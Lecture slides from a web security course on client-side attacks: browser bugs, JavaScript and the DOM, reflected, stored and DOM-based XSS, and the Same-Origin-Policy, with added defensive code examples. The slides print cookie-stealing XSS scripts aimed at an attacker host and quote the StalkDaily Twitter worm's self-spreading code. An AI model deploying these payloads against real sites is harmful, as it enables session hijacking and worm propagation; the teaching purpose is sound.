Attacks on Clients
Transcript of Attacks on Clients
Software and Web Security 2
Attacks on Clients
(Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS)
sws2 1
Last week: web server can be attacked by malicious input
[diagram: web browser → web server]
Last week: web server can be attacked by malicious input
This week: the client, ie the web browser, can be attacked by malicious input
Even the human user can be attacked: recall URL obfuscation.
[diagram: web browser ← web server]
example client-side problem
Browser bugs
The web browser gets untrusted input from the server. Bugs in the browser can become exploitable vulnerabilities
• also bugs in browser add-ons, or other helper applications
• Classic Denial of Service (DoS) example: IE image crash. An image with a huge declared size could crash Internet Explorer and freeze the Windows machine
<HTML><BODY><img src="a.jpg" width="999999999" height="99999999"></BODY></HTML>
Things get more interesting as processing in the browser gets more powerful, and the languages involved get more complex
More dangerous browser bugs
Denial of Service bugs are the least of your worries...
Possibility of drive-by downloads, where just visiting a webpage can install malware, by exploiting security holes in the browser, graphics libraries, media players, ...
Homework exercise: check securityfocus.com for security vulnerabilities for your favourite web browser
Dynamic webpages (Sect 7.1.3 & 7.2.4 in book)
Recall: dynamic webpages
Most web pages do not just contain static HTML, but are dynamic: ie they contain executable content. This is an interesting attack vector.
[diagram: web browser ← web server; execution aka processing of the content happens in the browser]
Dynamic Content
Languages for dynamic content:
• JavaScript
• Flash, Silverlight, ...
• ActiveX
• Java
• ....
JavaScript is by far the most widespread of these technologies: nearly all web pages include JavaScript
• CSS – Cascading Style Sheets – defines layout of headers, links, etc; not quite execution, but can be abused, and can contain JavaScript (eg the expression() construct supported by older versions of IE).
Controlling Dynamic Content (7.2.4)
Executing dynamic content can be controlled inside a sandbox
NB the sandbox is made from software: if there are security vulnerabilities in this software, all bets are off, and the attacker might escape...
ActiveX controls vs Java applets
ActiveX controls:
• Windows-only technology, runs in Internet Explorer (IE)
• binary code executed on behalf of the browser (binary code is for a specific machine)
• can access user files
• support for signed code; plus a Microsoft OS update can set a kill bit to stop dangerous controls
• an installed control can be run from any website (up to IE7)
• IE configuration options
– allow, block, prompt
– also control by administrator
Java applets:
• platform independent; downside: OS patching might miss Java patching
• bytecode executed on a virtual machine within the browser (byte code is interpreted by the virtual machine)
• restrictive sandbox
• support for signed code
• applet only runs on the site where it is embedded
• sandboxing configuration
JavaScript & the DOM (Sect 7.1.3)
JavaScript
• embedded in web page to support client-side dynamic behaviour
• developed by Netscape, later standardised by ECMA (as ECMAScript)
• JavaScript has NOTHING to do with Java
• typical uses:
– dynamic user interaction with the web page. Eg opening and closing menus, changing pictures,... JavaScript code can completely rewrite the contents of an HTML page!
– client-side input validation. Eg has the user entered a correct date, a syntactically correct email address or credit card number, or a strong enough password?
NB such validation should not be security critical! Why?
A malicious client can bypass such validation: the browser is under the attacker's control, so the server must re-validate everything it receives.
JavaScript (Sect 7.1.3 in book)
• scripting language interpreted by the browser, with code in the HTML
<script type="text/javascript"> ... </script>
The type attribute is optional; the default is JavaScript
• Built-in functions eg to change content of the window
<script> alert('Hello World!'); </script>
A web page can define additional functions
<script> function hi() { alert('Hello World!'); } </script>
• built-in events for reacting to user actions
<img src="pic.jpg" onMouseOver="javascript:hi()">
Some examples in http://www.cs.ru.nl/~erikpoll/sws2/demo/demo_javascript.html
DOM (Document Object Model)
The DOM is a representation of the content of a webpage, in OO style. The webpage is an object document with sub-objects, such as document.URL, document.referrer, document.cookie,...
JavaScript can interact with the DOM to access or change parts of the current webpage, incl. text, URL, cookies, ....
This gives JavaScript its real power! Eg it allows scripts to change layout and content of the webpage, open and close menus in the webpage,...
See http://www.cs.ru.nl/~erikpoll/sws2/demo/demo_DOM.html for some examples
Security features
• The user environment is protected from malicious JavaScript programs by a sand-boxing environment inside the browser
• JavaScript programs are protected from each other by compartmentalisation
– Same-Origin-Policy: code can only access resources with the same origin site (more on that later)
As we will see, such protection has its limits...
HTML injection & XSS
Search term entered: sos [Search]
No matches found for sos
Search term entered: <h1>sos</h1> [Search]
No matches found for
sos
(the <h1> tag is interpreted by the browser, so "sos" is rendered as a heading)
What proper input validation should produce
Search term entered: <h1>sos</h1> [Search]
No matches found for sos
or
Search term entered: <h1>sos</h1> [Search]
No matches found for <h1>sos</h1>
Here < and > are written as &lt; and &gt; in the HTML source, so the browser displays the tag instead of interpreting it
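The escaping step above, as an added example in JavaScript (not code from the lecture or its demo pages). It shows the vulnerable search-result rendering next to the escaped version; the page template and the search terms are made up for the example.

```javascript
// Added example, not from the slides: a minimal search-result renderer showing
// the HTML injection from the slides and the escaping that prevents it.
// Runs under Node.js; the page template is a made-up stand-in for the real site.

// Escape the characters that let attacker text change the structure of the
// HTML around it. '&' must go first, otherwise the entities we emit would be
// escaped a second time.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the search term is pasted into the page unchanged, so <h1>,
// <img> or <script> in the term become part of the page (HTML injection / XSS).
function renderSearchVulnerable(term) {
  return "<p>No matches found for " + term + "</p>";
}

// Fixed: the term is escaped, so the browser displays it literally.
// This escaping is only correct for text nodes and double-quoted attribute
// values; a term placed inside a <script> block or a URL needs different rules.
function renderSearchSafe(term) {
  return "<p>No matches found for " + escapeHtml(term) + "</p>";
}

// Crude self-check: does the page contain an opening tag with this name
// that was not part of our own template?
function containsTag(html, tagName) {
  return new RegExp("<" + tagName + "[\\s>/]", "i").test(html);
}

var payloads = ["sos", "<h1>sos</h1>", "<script>alert('Hoi');</script>"];
payloads.forEach(function (p) {
  console.log("vulnerable:", renderSearchVulnerable(p));
  console.log("safe:      ", renderSearchSafe(p));
});
```

Note that escaping is context dependent: the function above is right for text between tags and inside double-quoted attributes, which is where the search term lands here, but it is not enough for a value echoed into a JavaScript string, a URL or a CSS block.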
What can happen if we enter more complicated HTML code as search term?
<img src="http://www.spam.org/advert.jpg">
<script type="text/javascript"> alert('Hoi'); </script>
Note that in the last example we enter executable code – JavaScript. Such HTML injection is called Cross Site Scripting (XSS)
HTML injection
HTML injection: user input is echoed back to the client without validation or escaping
But why is this a security problem?
1. simple HTML injection: the attacker can deface a webpage, with pop-ups, ads, or fake info
http://cnn.com/search?string="<h1>Obama sends US troops to Kiev</h1> <img=.......>"
Such HTML injection abuses the trust that a user has in a website: the user believes the content is from the website, when in fact it comes from an attacker
2. XSS: the injected HTML contains executable content, typically JavaScript. Execution of this code can have all sorts of nasty effects...
XSS (Cross Site Scripting)
Attacker injects scripts into a website, such that
• scripts are passed on to a victim
• scripts are executed
– in the victim's browser
– with the victim's access rights
– with the victim's data – incl. cookies
– interacting with the user, with the webpage (using the DOM), causing new HTTP requests, ...
Usually injected scripts are JavaScript, but could be Flash, ActiveX, Java...
Simple HTML injection
[diagram: browser → web server → browser, the web server returning malicious output]
XSS
[diagram: the web server returns malicious output incl. scripts to the browser; the browser's processing of the malicious scripts causes unwanted requests to that web server and to another web server]
stealing cookies with XSS
Consider
http://victim.com/search.php?term=<script>window.open("http://mafia.com/steal.php?cookie=" + document.cookie)</script>
What if the user clicks on this link?
1. browser goes to http://victim.com/search.php
2. website victim.com returns
<HTML> Results for <script>....</script> </HTML>
3. browser executes the script and sends mafia his cookie
stealing cookies using XSS
More stealthy way of stealing cookies
<script>
img = new Image();
img.src = "http://mafia.com/" + encodeURI(document.cookie);
</script>
Better because the user won't notice a change in the webpage when this script is executed, unlike the one on the previous page: no window is opened, the browser just fetches the "image" and the cookie travels in the request URL.
NB cookies set with the HttpOnly flag are not visible in document.cookie, which blocks this particular trick (but not the other effects of XSS).
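What the stealthy script above actually leaks, and what the HttpOnly flag changes, as an added example in JavaScript (not code from the lecture). The Set-Cookie headers are constructed for the example; mafia.com is the slides' attacker host.

```javascript
// Added example, not from the slides: what the img.src cookie-stealing script
// exfiltrates, and the Set-Cookie attribute that keeps a cookie out of
// document.cookie. Runs under Node.js; the Set-Cookie headers are constructed.

// Minimal Set-Cookie parser: "name=value; Attr; Attr=val; ...".
function parseSetCookie(header) {
  var parts = header.split(";").map(function (p) { return p.trim(); });
  var eq = parts[0].indexOf("=");
  var cookie = {
    name: eq < 0 ? "" : parts[0].slice(0, eq),
    value: eq < 0 ? parts[0] : parts[0].slice(eq + 1),
    httpOnly: false,
    secure: false
  };
  parts.slice(1).forEach(function (attr) {
    var key = attr.split("=")[0].trim().toLowerCase();
    if (key === "httponly") cookie.httpOnly = true;
    if (key === "secure") cookie.secure = true;
  });
  return cookie;
}

// What document.cookie returns for a page of this site, given the Set-Cookie
// headers the server sent: only cookies without HttpOnly, as "name=value"
// pairs joined by "; " (attributes are never exposed to script).
function visibleCookieString(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter(function (c) { return !c.httpOnly; })
    .map(function (c) { return c.name + "=" + c.value; })
    .join("; ");
}

// The request URL the slides' img.src trick sends to the attacker. encodeURI
// leaves ';' and '=' untouched, so the cookie arrives readable in the attacker's log.
function beaconUrl(cookieString) {
  return "http://mafia.com/" + encodeURI(cookieString);
}

var headersWithoutFlag = ["session=abc123; Path=/", "theme=dark; Path=/"];
var headersWithFlag = ["session=abc123; Path=/; HttpOnly; Secure", "theme=dark; Path=/"];
console.log("without HttpOnly:", beaconUrl(visibleCookieString(headersWithoutFlag)));
console.log("with HttpOnly:   ", beaconUrl(visibleCookieString(headersWithFlag)));
```

With the flag set, the session cookie never appears in document.cookie, so the beacon only carries the harmless theme cookie. The injected script can still send requests in the victim's name, since the browser attaches the cookie to those itself; HttpOnly narrows the damage, it does not fix the XSS.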
Delivery mechanism for XSS
Different ways for an attacker to get scripts on to the victim's browser
1. reflected aka non-persistent XSS
2. stored aka persistent XSS
3. DOM based XSS
scenario 1: reflected XSS attack
• Attacker crafts a special URL for a vulnerable web site, often a URL containing JavaScript
• Attacker then tempts the victim to click on this link, by sending an email that includes the link, or posting this link on a website.
reflected aka non-persistent XSS
[diagram: the victim's browser sends the malicious URL to the web server, which replies with HTML containing the malicious output]
scenario 2: stored XSS attack
• Attacker injects HTML – incl. scripts – into a web site, which is stored at that web site
• This is echoed back later when a victim visits the same site
• Typical examples where an attacker can try this
– some web forum
– a book review on amazon.com
– a posting on blackboard.ru.nl
– ...
Web 2.0 web sites, which allow user-generated content, are ideal for this.
Stored aka persistent XSS
[diagram: the attacker's browser sends malicious input to the web server, storing malicious content on the website, which saves it in its database; later the web server sends HTML containing the malicious output to another user of the same website]
scenario 3: DOM based attack
Attacker injects malicious content into a webpage via existing scripts in that webpage that interact with the DOM
Eg, the JavaScript code
<script>
var pos = document.URL.indexOf("name=") + 5;
document.write(document.URL.substring(pos, document.URL.length));
</script>
in a webpage will copy the name parameter from the URL into that webpage.
Eg, for http://bla.com/welcome.html?name=Jan it will write Jan
But what if the URL contains JavaScript in the name?
eg http://bla.com/welcome.html?name=<script>...
An attacker can now use a malicious URL, as in a reflected attack
scenario 3: DOM based attack
The injected payload can for instance be in the URL. Details depend on the browser, eg the browser may encode < and > in the URL
A good web application might spot a malicious URL, but ... the server may be by-passed and never get to see the malicious payload!
http://bla.com/welcome.html#name=<script>.....</script>
The part of the URL after # is not sent to bla.com, but is part of document.URL. So server-side validation can't help...
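The two DOM-based slides above, as an added example in JavaScript (not code from the lecture): it shows what bla.com actually receives when the payload sits in the fragment, how the browser's own URL parser encodes < and >, and a hardened version of the welcome-page script. It runs under Node.js using the WHATWG URL class, which follows the same parsing rules as browsers; bla.com and the name parameter come from the slides.

```javascript
// Added example, not from the slides: the DOM-based XSS payload in the URL
// fragment, what the server sees of it, and a hardened welcome-page script.
// Runs under Node.js; bla.com and ?name= are the slides' example.

// The slides' vulnerable logic: everything after "name=" in document.URL,
// written into the page unescaped. The fragment is part of document.URL,
// so "#name=<script>..." is picked up just like "?name=...".
function vulnerableExtract(documentURL) {
  var pos = documentURL.indexOf("name=") + 5;
  return documentURL.substring(pos, documentURL.length);
}

// How a spec-compliant browser shows the URL: < and > are percent-encoded
// in the query (and fragment), which is the "details depend on the browser"
// caveat: an older browser that keeps them raw makes the exploit easier.
function asParsedByBrowser(rawURL) {
  return new URL(rawURL).href;
}

// The request line that actually reaches bla.com: path and query only.
// Nothing after '#' is sent, so server-side validation never sees it.
function requestLineSeenByServer(rawURL) {
  var u = new URL(rawURL);
  return "GET " + u.pathname + u.search + " HTTP/1.1";
}

function escapeHtml(s) {
  return String(s).replace(/&/g, "&amp;").replace(/</g, "&lt;")
    .replace(/>/g, "&gt;").replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Hardened: read the parameter with a real parser (query first, then fragment,
// both percent-decoded), and escape it before it reaches an HTML sink. In a
// browser, assigning to element.textContent instead of document.write avoids
// the HTML sink altogether.
function safeExtract(rawURL) {
  var u = new URL(rawURL);
  var fromQuery = u.searchParams.get("name");
  if (fromQuery !== null) return fromQuery;
  var fromHash = new URLSearchParams(u.hash.slice(1)).get("name");
  return fromHash === null ? "" : fromHash;
}

function safeRender(rawURL) {
  return "<p>Welcome " + escapeHtml(safeExtract(rawURL)) + "</p>";
}

var attackURL = "http://bla.com/welcome.html#name=<script>alert(document.cookie)</script>";
console.log("server sees:  ", requestLineSeenByServer(attackURL));
console.log("browser shows:", asParsedByBrowser(attackURL));
console.log("vulnerable:   ", vulnerableExtract(attackURL));
console.log("safe:         ", safeRender(attackURL));
```

The point of requestLineSeenByServer is the one the slide makes: a web application firewall or server-side filter cannot see the fragment at all, so the only place to fix DOM-based XSS is in the client-side script itself.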
XSS vulnerability on twitter
example: persistent XSS attack on Google docs
• save as CSV file in spreadsheets.google.com
• some web browsers render this content as HTML, and execute the script!
• this then allows attacks on gmail.com, docs.google.com, code.google.com, ... because these all share the same cookie
Is this the browser's fault, or the web-site's (ie google docs) fault?
Twitter StalkDaily worm
Included in twitter profile (executed when you see this profile):
<a href="http://stalkdaily.com"/><script src="http://evil.org/attack.js">
...where attack.js includes the following attack code
var update = urlencode("Hey everyone, join www.StalkDaily.com.");
var ajaxConn = new XHConn();
...
// tweet the link
ajaxConn.connect("/status/update", "POST",
  "authenticity_token=" + authtoken + "&status=" + update + "&tab=home&update=update");
var set = urlencode('http://stalkdaily.com"></a><script src="http://evil.org/attack.js"></script><script src="http://evil.org/attack.js"></script><a ');
// change profile to include the attack code!
ajaxConn1.connect("/account/settings", "POST",
  "authenticity_token=" + authtoken + "&user[url]=" + set + "&tab=home&update=update");
Same-Origin-Policy
Same-Origin-Policy (SOP)
The Same-Origin-Policy is intended to prevent attacks from a malicious website on other web pages a user is interacting with
Same-Origin-Policy prevents some interaction
[diagram: client browser with pages from twitter.com and mafia.com; scripts from the mafia.com page cannot access the twitter.com page]
Same-Origin-Policy (SOP)
The Same-Origin-Policy is intended to prevent attacks from a malicious website on other web pages a user is interacting with
Basic idea
• Scripts can only access information with the same origin, where origin is the triple <scheme, address, port>
– eg <http, ru.nl, 80>, <https, ru.nl, 1080>
• HTML content belongs to the origin it was downloaded from
• Scripts included in an HTML document have the origin of the document including them
– rationale: the author of the HTML page should know that the scripts he includes are harmless
See demos in http://www.cs.ru.nl/~erikpoll/sws2/demo/test_SOP.html and http://www.cs.ru.nl/~erikpoll/sws2/demo/test_SOP2.html
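The origin triple and the comparison the SOP makes, as an added example in JavaScript (not code from the lecture or its demo pages). It fills in the scheme's default port so that http://ru.nl and http://ru.nl:80 compare equal, and runs the check over the slides' example URLs; it runs under Node.js.

```javascript
// Added example, not from the slides: computing the origin triple
// <scheme, address, port> that the Same-Origin-Policy compares, and a
// same-origin check. Runs under Node.js using the WHATWG URL class.

var DEFAULT_PORTS = { http: "80", https: "443", ws: "80", wss: "443", ftp: "21" };

function origin(urlString) {
  var u = new URL(urlString);
  var scheme = u.protocol.replace(/:$/, "");
  // URL.port is "" when the port was omitted or is the scheme default,
  // so http://ru.nl and http://ru.nl:80 end up with the same triple.
  var port = u.port !== "" ? u.port : (DEFAULT_PORTS[scheme] || "");
  return { scheme: scheme, host: u.hostname, port: port };
}

// Serialised form in the slides' notation, handy for logging and for keying
// a map of per-origin state (cookies, storage, ...).
function originKey(urlString) {
  var o = origin(urlString);
  return "<" + o.scheme + ", " + o.host + ", " + o.port + ">";
}

// The SOP test itself: all three components must match exactly. Path, query
// and fragment play no role; sub-domains and other schemes are different origins.
function sameOrigin(a, b) {
  var oa = origin(a), ob = origin(b);
  return oa.scheme === ob.scheme && oa.host === ob.host && oa.port === ob.port;
}

var pairs = [
  ["http://ru.nl/", "http://ru.nl:80/some/page?x=1#frag"],
  ["http://ru.nl/", "https://ru.nl/"],
  ["https://ru.nl/", "https://ru.nl:1080/"],
  ["http://ru.nl/", "http://www.ru.nl/"],
  ["https://blackboard.ru.nl/", "http://mafia.com/steal_cookie.js"]
];
pairs.forEach(function (p) {
  console.log(originKey(p[0]), "vs", originKey(p[1]), "=>",
    sameOrigin(p[0], p[1]) ? "same origin" : "different origin");
});
```

The last pair is the trap discussed on the next slide: the origins of blackboard.ru.nl and mafia.com differ, but that comparison is never made for an included script. A script fetched from mafia.com by a page on blackboard.ru.nl runs with the origin of the including page, not with the origin it was fetched from.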
Will SOP prevent cookie stealing?
Suppose an attacker injects a cookie stealing script in blackboard.ru.nl
Will the SOP prevent this script from accessing the cookie? No!
Scripts included in blackboard.ru.nl will have access to the cookies of that domain, even if the script is included via a link to another site, such as
<script src="http://mafia.com/steal_cookie.js"></script>
Circumventing the Same-Origin-Policy
[diagram: the attacker's browser uploads malicious content to twitter.com; the client browser loads twitter.com and can't distinguish between good & bad scripts served by twitter.com, so the SOP does nothing to stop them; mafia.com shown alongside as the attacker's own site]